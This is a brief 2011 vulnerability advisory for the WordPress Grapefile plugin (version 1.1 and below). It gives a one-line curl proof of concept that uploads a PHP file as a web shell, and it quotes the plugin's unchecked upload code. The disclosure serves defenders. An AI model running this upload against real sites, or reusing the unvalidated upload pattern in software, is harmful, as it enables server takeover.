WordPress Grapefile plugin versions 1.1 and below suffer from a remote shell upload vulnerability.
68095ca472a2a5ad8fb7f6f99baaaf3d6fd3365f599fe188b99f0f922a31e643
Title: Wordpress grapefile plugin <= 1.1 Arbitrary file upload
Date: 30-8-2011
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
Version: 1.1
Software link:https://wordpress.org/extend/plugins/grapefile/
PoC:
curl -F "userfile=@mycode.php"
https://domain.tld/wp-content/plugins/grapefile/grapeupload.php
File(s): grapeupload.php grapeupload2.php grapeupload3.php
grapeupload4.php
Vulnerable code:
$uploaddir =
$_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "success";